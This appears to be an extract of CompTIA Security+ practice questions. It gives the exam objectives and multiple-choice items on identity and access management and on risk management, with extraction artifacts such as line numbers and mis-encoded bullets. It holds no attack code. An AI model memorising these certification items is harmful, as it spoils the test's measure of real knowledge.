3671SY0-501 topics covered in this
3672chapter include the following:
3673✓ ✓ 4.1 Compare and contrast identity and access
3674management concepts.
3675â– â–
3676Identification, authentication, authorization and accounting
3677(AAA)
3678â– â–
3679Multifactor authentication
3680â– â– Something you are
3681â– â– Something you have
3682â– â– Something you know
3683â– â– Somewhere you are
3684â– â– Something you do
3685â– â– Federation
3686â– â– Single sign-on
3687â– â– Transitive trust
3688✓ ✓ 4.2 Given a scenario, install and configure identity and
3689access services.
3690â– â– LDAP
3691â– â– Kerberos
3692â– â– TACACS+
3693â– â– CHAP
3694â– â– PAP
3695â– â– MSCHAP
3696â– â– RADIUS
3697â– â– SAML
3698â– â– OpenID Connectâ– â– OAUTH
3699â– â– Shibboleth
3700â– â– Secure token
3701â– â– NTLM
3702✓ ✓ 4.3 Given a scenario,implement identity and access
3703management controls.
3704â– â–
3705â– â–
3706â– â–
3707â– â–
3708â– â–
3709Access control models
3710â– â– MAC
3711â– â– DAC
3712â– â– ABAC
3713â– â– Role-based access control
3714â– â– Rule-based access control
3715Physical access control
3716â– â– Proximity cards
3717â– â– Smart cards
3718Biometric factors
3719â– â– Fingerprint scanner
3720â– â– Retinal scanner
3721â– â– Iris scanner
3722â– â– Voice recognition
3723â– â– Facial recognition
3724â– â– False acceptance rate
3725â– â– False rejection rate
3726â– â– Crossover error rate
3727Tokens
3728â– â– Hardware
3729â– â– Software
3730â– â– HOTP/TOTP
3731Certificate-based authentication
3732â– â– PIV/CAC/smart card
3733â– â– IEEE 802.1xâ– â– File system security
3734â– â– Database security
3735✓ ✓ 4.4 Given a scenario, differentiate common account
3736management practices.
3737â– â–
3738â– â–
3739â– â–
3740Account types
3741â– â– User account
3742â– â– Shared and generic accounts/credentials
3743â– â– Guest accounts
3744â– â– Service accounts
3745â– â– Privileged accounts
3746General Concepts
3747â– â– Least privilege
3748â– â– Onboarding/offboarding
3749â– â– Permission auditing and review
3750â– â– Usage auditing and review
3751â– â– Time-of-day restrictions
3752â– â– Recertification
3753â– â– Standard naming convention
3754â– â– Account maintenance
3755â– â– Group-based access control
3756â– â– Location-based policies
3757Account policy enforcement
3758â– â– Credential management
3759â– â– Group policy
3760â– â– Password complexity
3761â– â– Expiration
3762â– â– Recovery
3763â– â– Disablement
3764â– â– Lockout
3765â– â– Password history
3766â– â– Password reuse
3767â– â– Password lengthChapter 4
3768114
3769â–
3770Identity and Access Management
37711. Jack is using smart cards for authentication. He is trying to classify the type of authentica-
3772tion for a report to his CIO. What type of authentication is Jack using?
3773A. Type I
3774B. Type II
3775C. Type III
3776D. Strong
37772. Carole is responsible for various network protocols at her company. The network time
3778protocol has been intermittently failing. Which of the following would be most affected?
3779A. Kerberos
3780B. RADIUS
3781C. CHAP
3782D. LDAP
37833. You are selecting an authentication method for your company’s servers. You are looking
3784for a method that periodically reauthenticates clients to prevent session hijacking. Which
3785of the following would be your best choice?
3786A. PAP
3787B. SPAP
3788C. CHAP
3789D. OAUTH
37904. Emiliano is working for a small company. His company is concerned about authentica-
3791tion and wants to implement biometrics using facial recognition and fingerprint scanning.
3792How would this authentication be classified?
3793A. Type I
3794B. Type II
3795C. Type III
3796D. Strong
37975. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle
3798database server. Which of the following would be the best type of account to assign to the
3799database service?
3800A. User
3801B. Guest
3802C. Admin
3803D. Service
38046. You have been asked to select an authentication method that will support single sign-on,
3805integrate with SAML, and work well over the Internet. Which of the following would be
3806your best choice?
3807A. Shibboleth
3808B.
3809OAUTHChapter 4
3810C. SPAP
3811D. CHAP
3812â–
3813Identity and Access Management
3814115
38157. Which authentication method was used as a native default for older versions of Microsoft
3816Windows?
3817A. PAP
3818B. CHAP
3819C. OAUTH
3820D. NTLM
38218. Carl has been asked to set up access control for a server. The requirements state that users
3822at a lower privilege level should not be able to see or access files or data at a higher privi-
3823lege level. What access control model would best fit these requirements?
3824A. MAC
3825B. DAC
3826C. RBAC
3827D. SAML
38289. Clarice is concerned about an attacker getting information regarding network resources
3829in her company. Which protocol should she implement that would be most helpful in miti-
3830gating this risk?
3831A. LDAP
3832B. TLS
3833C. SNMP
3834D. LDAPS
383510. Ahmed is looking for an authentication protocol for his network. He is very concerned
3836about highly skilled attackers. As part of mitigating that concern, he wants an authentica-
3837tion protocol that never actually transmits a user’s password, in any form. Which authen-
3838tication protocol would be a good fit for Ahmed’s needs?
3839A. CHAP
3840B. Kerberos
3841C. RBAC
3842D. Type II
384311. You work for a social media website. You wish to integrate your users’ accounts with
3844other web resources. To do so, you need to allow authentication to be used across differ-
3845ent domains, without exposing your users’ passwords to these other services. Which of the
3846following would be most helpful in accomplishing this goal?
3847A. Kerberos
3848B. SAML
3849C. OAUTH
3850D. OpenIDChapter 4
3851116
3852â–
3853Identity and Access Management
385412. Mary is trying to set up remote access to her network for salespeople in her company.
3855Which protocol would be most helpful in accomplishing this goal?
3856A. RADIUS
3857B. Kerberos
3858C. CHAP
3859D. OpenID
386013. Victor is trying to identify the protocol used by Windows for authentication to a server
3861that is not part of the network domain. Which of the following would be most useful for
3862Victor?
3863A. Kerberos
3864B. NTLM
3865C. OpenID
3866D. CHAP
386714. You have been asked to find an authentication service that is handled by a third party.
3868The service should allow users to access multiple websites, as long as they support the
3869third-party authentication service. What would be your best choice?
3870A. OpenID
3871B. Kerberos
3872C. NTLM
3873D. Shibboleth
387415. Abigail is implementing biometrics for her company. She is trying to get the false rejection
3875rate and false acceptance rate to the same level. What is the term used for this?
3876A. Crossover error rate
3877B. Leveling
3878C. Balanced error rate
3879D. Remediation
388016. Mia is responsible for website security for a bank. When a user forgets their password, she
3881wants a method to give them a temporary password. Which of the following would be the
3882best solution for this situation?
3883A. Facial recognition
3884B. Digital certificate authentication
3885C. RBAC
3886D. TOTP
388717. George wants a secure authentication protocol that can integrate with RADIUS and can
3888use digital certificates. Which of the following would be his best choice?
3889A. CHAP
3890B.
3891802.11iChapter 4
3892C. 802.1x
3893D. OAUTH
3894â–
3895Identity and Access Management
3896117
389718. Jacob is responsible for database server security in his company. He is very concerned
3898about preventing unauthorized access to the databases. Which of the following would be
3899the most appropriate for him to implement?
3900A. ABAC
3901B. TOTP
3902C. HIDS
3903D. DAMP
390419. Mason is responsible for security at a company that has traveling salespeople. The com-
3905pany has been using ABAC for access control to the network. Which of the following is an
3906issue that is specific to ABAC and might cause it to incorrectly reject logins?
3907A. Geographic location
3908B. Wrong password
3909C. Remote access is not allowed by ABAC.
3910D. Firewalls usually block ABAC.
391120. You work for a U.S. defense contractor. You are setting up access cards that have chips
3912embedded in them to provide access control for users in your company. Which of the fol-
3913lowing types of cards would be best for you to use?
3914A. CAC
3915B. PIV
3916C. NFC
3917D. Smart card
391821. Darrell is concerned that users on his network have too many passwords to remember and
3919might write down their passwords, thus creating a significant security risk. Which of the
3920following would be most helpful in mitigating this issue?
3921A. OAUTH
3922B. SSO
3923C. OpenID
3924D. Kerberos
392522. Fares is a security administrator for a large company. Occasionally, a user needs to access
3926a specific resource that they don’t have permission to access. Which access control meth-
3927odology would be most helpful in this situation?
3928A. Mandatory Access Control
3929B. Discretionary Access Control
3930C. Role-based Access Control
3931D. Rule-based Access ControlChapter 4
3932118
3933â–
3934Identity and Access Management
393523. You are comparing biometric solutions for your company, and the product you pick must
3936have an appropriate False Acceptance Rate (FAR). Which of the following best describes
3937FAR?
3938A. How often an unauthorized user is granted access by mistake
3939B. How readily users accept the new technology, based on ease of use
3940C. How often an authorized user is not granted access
3941D. How frequently the system is offline
394224. Amelia is looking for a network authentication method that can use digital certificates
3943and does not require end users to remember passwords. Which of the following would
3944best fit her requirements?
3945A. OAUTH
3946B. Tokens
3947C. OpenID
3948D. RBAC
394925. You are responsible for setting up new accounts for your company network. What is the
3950most important thing to keep in mind when setting up new accounts?
3951A. Password length
3952B. Password complexity
3953C. Account age
3954D. Least privileges
395526. Stefan just became the new security officer for a university. He is concerned that student
3956workers who work late on campus could try and log in with faculty credentials. Which of
3957the following would be most effective in preventing this?
3958A. Time of day restrictions
3959B. Usage auditing
3960C. Password length
3961D. Credential management
396227. Jennifer is concerned that some people in her company have more privileges than they
3963should. This has occurred due to people moving from one position to another, and having
3964cumulative rights that exceed the requirements of their current jobs. Which of the follow-
3965ing would be most effective in mitigating this issue?
3966A. Permission auditing
3967B. Job rotation
3968C. Preventing job rotation
3969D. Separation of dutiesChapter 4
3970â–
3971Identity and Access Management
3972119
397328. Chloe has noticed that users on her company’s network frequently have simple passwords
3974made up of common words. Thus, they have weak passwords. How could Chloe best miti-
3975gate this issue?
3976A. Increase minimum password length.
3977B. Have users change passwords more frequently.
3978C. Require password complexity.
3979D. Implement Single Sign-On (SSO).
398029. Bart is looking for a remote access protocol for his company. It is important that the
3981solution he selects support multiple protocols and use a reliable network communication
3982protocol. Which of the following would be his best choice?
3983A. RADIUS
3984B. TACACS+
3985C. NTLM
3986D. CHAP
398730. You are looking for an authentication method that has one-time passwords and
3988works well with the Initiative for Open Authentication. However, the user should
3989have unlimited time to use the password. Which of the following would be your best
3990choice?
3991A. CHAP
3992B. TOTP
3993C. HOTP
3994D. ABAC
399531. Gerard is trying to find a flexible remote access protocol that can use either TCP or UDP.
3996Which of the following should he select?
3997A. RADIUS
3998B. DIAMETER
3999C. TACACS+
4000D. TACACS
400132. Emiliano is considering voice recognition as part of his access control strategy. What is
4002one weakness with voice recognition?
4003A. People’s voices change.
4004B. Systems require training.
4005C. High false negative rate
4006D. High false positive rateChapter 4
4007120
4008â–
4009Identity and Access Management
401033. You are explaining facial recognition to a colleague. What is the most significant draw-
4011back to implementing facial recognition?
4012A. These systems can be expensive.
4013B. These systems can be fooled with facial hair, glasses, etc.
4014C. These systems have a high false positive rate.
4015D. The systems require a long time to observe a face.
401634. Mohanned is responsible for account management at his company. He is very concerned
4017about hacking tools that rely on rainbow tables. Which of the following would be most
4018effective in mitigating this threat?
4019A. Password complexity
4020B. Password age
4021C. Password expiration
4022D. Password length
402335. Mary is a security administrator for a mid-sized company. She is trying to securely off-
4024board employees. What should she do with the network account for an employee who is
4025being off-boarded?
4026A. Disable the account.
4027B. Delete the account.
4028C. Change the account password.
4029D. Leave the account as is.
403036. Your supervisor tells you to implement security based on your users’ physical characteris-
4031tics. Under which type of security would hand scanning and retina scanning fall?
4032A. CHAP
4033B. Multifactor
4034C. Biometrics
4035D. Token
403637. What port does TACACS use?
4037A. TCP 143
4038B. TCP and UDP 49
4039C. TCP 443
4040D. UDP 53
404138. A company-wide policy is being created to define various security levels. Which of the fol-
4042lowing systems of access control would use documented security levels like Confidential
4043or Secret for information?
4044A. RBAC
4045B. MAC
4046C. DAC
4047D. BBCChapter 4
4048â–
4049Identity and Access Management
4050121
405139. There is a common security issue that is extremely hard to control in large environments.
4052It occurs when a user has more computer rights, permissions, and privileges than what is
4053required for the tasks the user needs to fulfill. This is the opposite of what principle?
4054A. Separation of duties
4055B. Least privileges
4056C. Transitive trust
4057D. Account management
405840. Users in your network are able to assign permissions to their own shared resources.
4059Which of the following access control models is used in your network?
4060A. DAC
4061B. RBAC
4062C. MAC
4063D. ABAC
406441. John is performing a port scan of a network as part of a security audit. He notices that the
4065domain controller is using secure LDAP. Which of the following ports would lead him to
4066that conclusion?
4067A. 53
4068B. 389
4069C. 443
4070D. 636
407142. Which of the following access control methods grants permissions based on the user’s
4072position in the organization?
4073A. MAC
4074B. RBAC
4075C. DAC
4076D. ABAC
407743. Which of the following can be used as a means for dual-factor authentication?
4078A. Password and PIN number
4079B. RADIUS and L2TP
4080C. LDAP and WPA
4081D. Iris scan and password
408244. Kerberos uses which of the following to issue tickets?
4083A. Authentication service
4084B. Certificate authority
4085C. Ticket-granting service
4086D. Key distribution centerChapter 4
4087122
4088â–
4089Identity and Access Management
409045. A company requires that a user’s credentials include providing something they know and
4091something they are in order to gain access to the network. Which of the following types of
4092authentication is being described?
4093A. Token
4094B. Two-factor
4095C. Kerberos
4096D. Biometrics
409746. Samantha is looking for an authentication method that incorporates the X.509 standard
4098and will allow authentication to be digitally signed. Which of the following authentication
4099methods would best meet these requirements?
4100A. Certificate-based authentication
4101B. OAUTH
4102C. Kerberos
4103D. Smart cards
410447. Your company relies heavily on cloud and SaaS service providers such as salesforce.com,
4105Office365, and Google. Which of the following would you have security concerns about?
4106A. LDAP
4107B. TACACS+
4108C. SAML
4109D. Transitive trust
411048. Greg is responsible for database security for his company. He is concerned about authenti-
4111cation and permissions. Which of the following should be his first step?
4112A. Implement minimum password length.
4113B. Implement password lockout.
4114C. Conduct a permissions audit.
4115D. Ensure least privileges.
411649. Which of the following is a step in account maintenance?
4117A. Implement two-factor authentication.
4118B. Check for time of day restrictions.
4119C. Review onboarding processes.
4120D. Check to see that all accounts are for active employees.
412150. Tyrell works as a security officer for a mid-sized bank. All the employees only work in the
4122office; there are no employees who work remotely or travel for company business. Tyrell
4123is concerned about someone using an employee’s login credentials to access the bank’s
4124network. Which of the following would be most effective in mitigating this threat?
4125A. Kerberos authentication
4126B.
4127TOTPChapter 4
4128C. Location-based policies
4129D. Group-based access control
4130â–
4131Identity and Access Management
4132123
413351. Henry is an employee at Acme Company. The company requires him to change his
4134password every three months. He has trouble remembering new passwords, so he keeps
4135switching between just two passwords. Which policy would be most effective in prevent-
4136ing this?
4137A. Password complexity
4138B. Password history
4139C. Password length
4140D. Password age
414152. Sheila is concerned that some users on her network may be accessing files that they should
4142not—specifically, files that are not required for their job tasks. Which of the following
4143would be most effective in determining if this is happening?
4144A. Usage auditing and review
4145B. Permissions auditing and review
4146C. Account maintenance
4147D. Policy review
414853. In which of the following scenarios would using a shared account pose the least security
4149risk?
4150A. For a group of tech support personnel
4151B. For guest Wi-Fi access
4152C. For students logging in at a university
4153D. For accounts with few privileges
415454. Which of the following is not a part of password complexity?
4155A. Using both uppercase and lowercase letters
4156B. Minimum password length
4157C. Using numbers
4158D. Using symbols (such as $, #, etc.)
415955. Jane is setting up login accounts for federated identities. She wants to avoid requiring
4160the users to remember login credentials and allow them to use their logins from the
4161originating network. Which of the following technologies would be most suitable for
4162implementing this?
4163A. Credential management
4164B. OAUTH
4165C. Kerberos
4166D. ShibbolethChapter 4
4167124
4168â–
4169Identity and Access Management
417056. Sam is responsible for password management at a large company. Sometimes users cannot
4171recall their passwords. What would be the best solution for him to address this?
4172A. Changing password history length
4173B. Implementing password recovery
4174C. Eliminating password complexity
4175D. Lengthening password age
417657. You are a security administrator for an insurance company. You have discovered that
4177there are a few active accounts for employees who left the company over a year ago.
4178Which of the following would best address this issue?
4179A. Password complexity
4180B. Offboarding procedures
4181C. Onboarding procedures
4182D. Password expiration
418358. Maria is responsible for security at a small company. She is concerned about unauthorized
4184devices being connected to the network. She is looking for a device authentication process.
4185Which of the following would be the best choice for her?
4186A. CHAP
4187B. Kerberos
4188C. 802.11i
4189D. 802.1x
419059. Laura is a security admin for a mid-sized mortgage company. She wants to ensure that the
4191network is using the most secure login and authentication scheme possible. Which of the
4192following would be her best choice?
4193A. Iris scanning
4194B. Fingerprint scanning
4195C. Multifactor authentication
4196D. Smart cards
419760. Charles is a CISO for an insurance company. He recently read about an attack wherein
4198an attacker was able to enumerate all the network resources, and was able to make some
4199resources unavailable. All this was done by exploiting a single protocol. Which protocol
4200should Charles secure to mitigate this attack?
4201A. SNMP
4202B. LDAP
4203C. HTTP
4204D. DHCP
420561. Robert is using PAP for authentication in his network. What is the most significant weak-
4206ness in PAP?
4207A. Unsigned authentication
4208B.
4209Single factorChapter 4
4210C. Credentials sent in cleartext
4211D. PAP does not support TACACS+.
4212â–
4213Identity and Access Management
4214125
421562. You are responsible for account access control and authorization at a large university.
4216There are approximately 30,000 students and 1,200 faculty/staff for whom you must
4217manage accounts. Which of the following would be the best access control/account man-
4218agement approach?
4219A. Group-based
4220B. Location-based
4221C. MAC
4222D. DAC
422363. Which of the following is most important in managing account permissions?
4224A. Account recertification
4225B. Usage auditing
4226C. Standard naming conventions
4227D. Account recovery
422864. Which of the following would be the best choice for naming the account of John Smith,
4229who is a domain administrator?
4230A. dm_jsmith
4231B. jsmithAdmin
4232C. AdministratorSmith
4233D. jsmith
423465. Megan is very concerned about file system security on her network servers. Which of the
4235following is the most basic form of file system security?
4236A. Encryption
4237B. Access control
4238C. Auditing
4239D. RAID
424066. Karen is responsible for account security in her company. She has discovered a reception-
4241ist whose account has a six-character password that has not been changed in two years,
4242and her password history is not being maintained. What is the most significant problem
4243with this account?
4244A. Nothing, this is adequate for a low-security position.
4245B. The password length is the most significant problem.
4246C. The lack of password history is the most significant problem.
4247D. The age of the password is the most significant problem.Chapter 4
4248126
4249â–
4250Identity and Access Management
425167. When you’re offboarding an employee, which of the following is the first thing you should do?
4252A. Audit their computer.
4253B. Conduct an out-processing questionnaire.
4254C. Disable accounts.
4255D. Delete accounts.
425668. Which of the following is a difference between TACACS and TACACS+?
4257A. TACACS uses TCP, TACACS+ uses UDP
4258B. TACACS uses UDP, TACACS+ uses TCP
4259C. TACACS uses TCP or UDP, TACACS+ uses UDP
4260D. TACACS uses UDP, TACACS+ uses UDP or TCP
426169. Greg is considering using CHAP or MS-CHAPv2 for authenticating remote users. Which
4262of the following is a major difference between the two protocols?
4263A. CHAP uses a hash for the challenge, MS-CHAPv2 uses AES.
4264B. CHAP provides mutual authentication, MS-CHAPv2 does not.
4265C. CHAP uses AES for the challenge, MS-CHAPv2 uses a hash.
4266D. MS-CHAPv2 provides mutual authentication, CHAP does not.
426770. Terrance is looking for a physical access solution that uses asymmetric cryptography (pub-
4268lic key cryptography) to authorize the user. What type of solution is this?
4269A. Asynchronous password token
4270B. Challenge response token
4271C. TOTP token
4272D. Static password token
427371. Which access control model is based on the Trusted Computer System Evaluation Criteria
4274(TCSEC)?
4275A. ABAC
4276B. MAC
4277C. RBAC
4278D. DAC
427972. Mary is responsible for the security of database servers at a mortgage company. The serv-
4280ers are Windows Server 2016. She is concerned about file system security. Which of the
4281following Microsoft features would be most helpful to her in implementing file system
4282security?
4283A. Password policies
4284B. EFS
4285C. Account lockout
4286D. UACChapter 4
4287â–
4288Identity and Access Management
4289127
429073. Santiago manages database security for a university. He is concerned about ensuring that
4291appropriate security measures are implemented. Which of the following would be most
4292important to database security?
4293A. Password policies
4294B. Antivirus
4295C. EFS
4296D. Access control policies
429774. Ingrid is reviewing her company’s recertification policy. Which of the following is the best
4298reason to recertify?
4299A. To audit usage
4300B. To enhance onboarding
4301C. To audit permissions
4302D. To manage credentials
430375. Emma is concerned about credential management. Users on her network often have over a
4304half-dozen passwords to remember. She is looking for a solution to this problem. Which of
4305the following would be the best way to address this issue?
4306A. Implement a manager.
4307B. Use shorter passwords.
4308C. Implement OAUTH.
4309D. Implement Kerberos.
431076. Magnus is concerned about someone using a password cracker on computers in his com-
4311pany. He is concerned that crackers will attempt common passwords in order to log in to
4312a system. Which of the following would be best for mitigating this threat?
4313A. Password age restrictions
4314B. Password minimum length requirements
4315C. Account lockout policies
4316D. Account usage auditing
431777. Lucas is looking for an XML-based open standard for exchanging authentication infor-
4318mation. Which of the following would best meet his needs?
4319A. SAML
4320B. OAUTH
4321C. RADIUS
4322D. NTLMChapter 4
4323128
4324â–
4325Identity and Access Management
432678. Which of the following processes transpires when a user provides a correct username and
4327password?
4328A. Identification
4329B. Authentication
4330C. Authorization
4331D. Accounting
433279. Min-seo is looking for a type of access control that enforces authorization rules by the
4333operating system. Users cannot override authentication or access control policies. Which
4334of the following best fits this description?
4335A. DAC
4336B. MAC
4337C. RBAC
4338D. ABAC
433980. Hinata is considering biometric access control solutions for her company. She is concerned
4340about the crossover error rate (CER). Which of the following most accurately describes
4341the CER?
4342A. The rate of false acceptance
4343B. The rate of false rejection
4344C. The point at which false rejections outpace false acceptances
4345D. The point at which false rejections and false acceptances are equal
434681. Joshua is looking for an authentication protocol that would be effective at stopping ses-
4347sion hijacking. Which of the following would be his best choice?
4348A. CHAP
4349B. PAP
4350C. SPAP
4351D. RADIUS
435282. David is trying to select an authentication method for his company. He needs one that will
4353support REST as well as multiple web-based and mobile clients. Which of the following
4354would be his best choice?
4355A. Shibboleth
4356B. RADIUS
4357C. OpenID Connect
4358D. OAuth
435983. Phillip is examining options for controlling physical access to the server room at his com-
4360pany. He wants a hands-free solution. Which of the following would be his best choice?
4361A. Smart cards
4362B.
4363Proximity cardsChapter 4
4364C. Tokens
4365D. Fingerprint scanner
4366â–
4367Identity and Access Management
436884. Which of the following is the most significant disadvantage of federated identities?
4369A. They cannot be used with Kerberos.
4370B. They don’t implement least privileges.
4371C. Poor password management
4372D. Transitive trust
437385. Max is implementing type II authentication for his company. Which of the following
4374would be an example of type II authentication?
4375A. Strong passwords
4376B. Retinal scan
4377C. Smart cards
4378D. Timed one-time passwords
437986. Nicole is implementing a server authentication method that depends on a TPM in the
4380server. Which of the following best describes this approach?
4381A. Hardware-based access control
4382B. Software-based access control
4383C. Digital certificate–based access control
4384D. Chip-based access control
4385129Chapter
43865
4387Risk Management
4388The CompTIA Security+ Exam
4389SY0-501 topics covered in this
4390chapter include the following:
4391✓ ✓ 5.1 Explain the importance of policies, plans and
4392procedures related to organizational security.
4393â– â– Standard operating procedure
4394â– â– Agreement types
4395â– â–
4396â– â– BPA
4397â– â– SLA
4398â– â– ISA
4399â– â– MOU/MOA
4400Personnel management
4401â– â– Mandatory vacations
4402â– â– Jot rotation
4403â– â– Separation of duties
4404â– â– Clean desk
4405â– â– Background checks
4406â– â– Exit interviews
4407â– â– Role-based awareness training
4408â– â– Data owner
4409â– â– System administrator
4410â– â– System owner
4411â– â– User
4412â– â– Privileged user
4413â– â– Executive user
4414â– â– NDA
4415â– â– Onboarding
4416â– â– Continuing education
4417â– â– Acceptable use policy/rules of behavior
4418â– â– Adverse actionsâ– â–
4419General security policies
4420â– â– Social media networks/applications
4421â– â– Personal email
4422✓ ✓ 5.2 Summarize business impact analysis concepts.
4423â– â– RTO/RPO
4424â– â– MTBF
4425â– â– MTTR
4426â– â– Mission-essential functions
4427â– â– Identification of critical systems
4428â– â– Single point of failure
4429â– â– Impact
4430â– â– Life
4431â– â– Property
4432â– â– Safety
4433â– â– Finance
4434â– â– Reputation
4435â– â– Privacy impact assessment
4436â– â– Privacy threshold assessment
4437✓ ✓ 5.3
4438â– â–
4439Explain risk management processes and concepts.
4440Threat assessment
4441â– â– Environmental
4442â– â– Manmade
4443â– â– Internal vs external
4444â– â– Risk assessment
4445â– â– SLE
4446â– â– ALE
4447â– â– ARO
4448â– â– Asset value
4449â– â– Risk register
4450â– â– Likelihood of occurrence
4451â– â– Supply chain assessment
4452â– â– Impact
4453â– â– Quantitativeâ– â– Qualitative
4454â– â– Testing
4455â– â–
4456â– â–
4457â– â– Penetration testing authorization
4458â– â– Vulnerability testing authorization
4459Risk response techniques
4460â– â– Accept
4461â– â– Transfer
4462â– â– Avoid
4463â– â– Mitigate
4464Change Management
4465✓ ✓ 5.4 Given a scenario, follow incident response procedures.
4466â– â–
4467â– â–
4468✓ ✓ 5.5
4469Incident response plan
4470â– â– Documented incident types/category definitions
4471â– â– Roles and responsibilities
4472â– â– Reporting requirements/escalation
4473â– â– Cyber-incident response teams
4474â– â– Exercise
4475Incident response process
4476â– â– Preparation
4477â– â– Identification
4478â– â– Containment
4479â– â– Eradication
4480â– â– Recovery
4481â– â– Lessons learned
4482Summarize basic concepts of forensics.
4483â– â– Order of volatility
4484â– â– Chain of custody
4485â– â– Legal hold
4486â– â– Data acquisition
4487â– â– Capture system image
4488â– â– Network traffic and logs
4489â– â– Capture video
4490â– â– Record time offsetâ– â– Take hashes
4491â– â– Screenshots
4492â– â– Witness interviews
4493â– â– Preservation
4494â– â– Recovery
4495â– â– Strategic intelligence/counterintelligence gathering
4496â– â–
4497â– â–
4498Active logging
4499Track man-hours
4500✓ ✓ 5.6 Explain disaster recovery and continuity of operation
4501concepts.
4502â– â–
4503Recovery sites
4504â– â– Hot site
4505â– â– Warm site
4506â– â– Cold site
4507â– â– Order of restoration
4508â– â– Backup concepts
4509â– â–
4510â– â–
4511â– â– Differential
4512â– â– Incremental
4513â– â– Snapshots
4514â– â– Full
4515Geographic considerations
4516â– â– Off-site backups
4517â– â– Distance
4518â– â– Location selection
4519â– â– Legal implications
4520â– â– Data sovereignty
4521Continuity of operation planning
4522â– â– Exercises/tabletop
4523â– â– After-action reports
4524â– â– Failover
4525â– â– Alternate processing sites
4526■■Alternate business practices✓ ✓ 5.7 Compare and contrast various types of controls.
4527â– â– Deterrent
4528â– â– Preventive
4529â– â– Detective
4530â– â– Corrective
4531â– â– Compensating
4532â– â– Technical
4533â– â– Administrative
4534â– â– Physical
4535✓ ✓ 5.8 Given a scenario, carry out data security and privacy
4536practices.
4537â– â–
4538â– â–
4539â– â–
4540Data destruction and media sanitization
4541â– â– Burning
4542â– â– Shredding
4543â– â– Pulping
4544â– â– Pulverizing
4545â– â– Degaussing
4546â– â– Purging
4547â– â– Wiping
4548Data sensitivity labeling and handling
4549â– â– Confidential
4550â– â– Private
4551â– â– Public
4552â– â– Proprietary
4553â– â– PII
4554â– â– PHI
4555Data roles
4556â– â– Owner
4557â– â– Steward/custodian
4558â– â– Privacy officer
4559â– â– Data retention
4560â– â– Legal and complianceChapter 5
4561136
4562â–
4563Risk Management
45641. You are a manager of a bank and you suspect one of your tellers has stolen money from
4565their station. After talking with your supervisor, you place the employee on leave with
4566pay, suspend their computer account, and obtain their proximity card and keys to the
4567building. Which of the following policies did you follow?
4568A. Mandatory vacations
4569B. Exit interviews
4570C. Adverse actions
4571D. Onboarding
45722. Which of the following principles stipulates that multiple changes to a computer system
4573should not be made at the same time?
4574A. Due diligence
4575B. Acceptable use
4576C. Change management
4577D. Due care
45783. Why are penetration test often not advised?
4579A. It can be disruptive for the business activities.
4580B. It is able to measure and authenticate the efficiency of a company’s defensive
4581mechanisms.
4582C. It’s able to find both known and unknown hardware or software weaknesses.
4583D. It permits the exploration of real risks and gives a precise depiction of a company’s IT
4584infrastructure security posture at any given time.
45854. You are a security engineer and discovered an employee using the company’s computer
4586systems to operate their small business. The employee installed their personal software
4587on the company’s computer and is using the computer hardware, such as the USB port.
4588What policy would you recommend the company implement to prevent any risk of the
4589company’s data and network being compromised?
4590A. Acceptable use policy
4591B. Clean desk policy
4592C. Mandatory vacation policy
4593D. Job rotation policy
45945. What should be done to back up tapes that are stored off-site?
4595A. Generate a file hash for each backup file.
4596B. Scan the backup data for viruses.
4597C. Perform a chain of custody on the backup tape.
4598D. Encrypt the backup data.
45996. Which recovery site is the easiest to test?
4600A. Warm site
4601B.
4602Cold siteChapter 5
4603C. Hot site
4604D. Medium site
4605â–
4606Risk Management
4607137
46087. Katelyn is a network technician for a manufacturing company. She is testing a network
4609forensic capturing software and plugs her laptop into an Ethernet switch port and
4610begins capturing network traffic. Later she begins to analyze the data and notices some
4611broadcast and multicast packets, as well as her own laptop’s network traffic. Which of
4612the following statements best describes why Katelyn was unable to capture all network
4613traffic on the switch?
4614A. Each port on the switch is an isolated broadcast domain.
4615B. Each port on the switch is an isolated collision domain.
4616C. Promiscuous mode must be enabled on the NIC.
4617D. Promiscuous mode must be disabled on the NIC.
46188. Which of the following is not a step of the incident response process?
4619A. Snapshot
4620B. Preparation
4621C. Recovery
4622D. Containment
46239. Which of the following is another term for technical controls?
4624A. Access controls
4625B. Logical controls
4626C. Detective controls
4627D. Preventive controls
462810. You are a security manager for your company and need to reduce the risk of employees
4629working in collusion to embezzle funds. Which of the following policies would you
4630implement?
4631A. Mandatory vacations
4632B. Clean desk
4633C. NDA
4634D. Continuing education
463511. You are a security administrator, and your manager has asked you about protecting
4636the privacy of personally identifiable information (PII) that is collected. Which of the
4637following would be the best option to fulfill the request?
4638A. PIA
4639B. BIA
4640C. RTO
4641D. SPFChapter 5
4642138
4643â–
4644Risk Management
464512. Which of the following plans best identifies critical systems and components to ensure the
4646assets are protected?
4647A. DRP
4648B. BCP
4649C. IT contingency plan
4650D. Succession plan
465113. After your company implemented a clean desk policy, you have been asked to secure
4652physical documents every night. Which of the following would be the best solution?
4653A. Department door lock
4654B. Locking cabinets and drawers
4655C. Proximity card
4656D. Onboarding
465714. Your manager has instructed the team to test certain systems based on the business
4658continuity plan to ensure they are operating properly. The manager wants to ensure there
4659are no overlaps in the plan before implementing the test. Which continuity of operation
4660planning concept is your manager referring to?
4661A. After-action report
4662B. Failover
4663C. Eradication
4664D. Tabletop exercise
466515. Which of the following is an example of PHI?
4666A. Passport number
4667B. Criminal record
4668C. Fingerprints
4669D. Name of school attended
467016. Which of the following techniques attempts to predict the likelihood a threat will occur
4671and assigns monetary values should a loss occur?
4672A. Change management
4673B. Vulnerability assessment
4674C. Qualitative risk assessment
4675D. Quantitative risk assessment
467617. Your competitors are offering a new service that is predicted to sell strong. After much
4677careful research, your company has decided not to launch a competing service due to the
4678uncertainty of the market and the enormous investment required. Which of the following
4679best describes the company’s decision?
4680A. Risk transfer
4681B.
4682Risk avoidanceChapter 5
4683C. Risk acceptance
4684D. Risk mitigation
4685â–
4686Risk Management
4687139
468818. Which of the following agreements is less formal than a traditional contract but still has a
4689certain level of importance to all parties involved?
4690A. SLA
4691B. BPA
4692C. ISA
4693D. MOU
469419. Your company is considering moving its mail server to a hosting company. This will help
4695reduce hardware and server administrator costs at the local site. Which of the following
4696documents would formally state the reliability and recourse if the reliability is not met?
4697A. MOU
4698B. SLA
4699C. ISA
4700D. BPA
470120. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that
4702asset is 35%, and the annualized rate of occurrence if 75%. What is the SLE?
4703A. $5,600
4704B. $5,000
4705C. $4,200
4706D. $3,000
470721. During a meeting, you present management with a list of access controls used on your
4708network. Which of the following controls is an example of a corrective control?
4709A. IDS
4710B. Audit logs
4711C. Antivirus software
4712D. Router
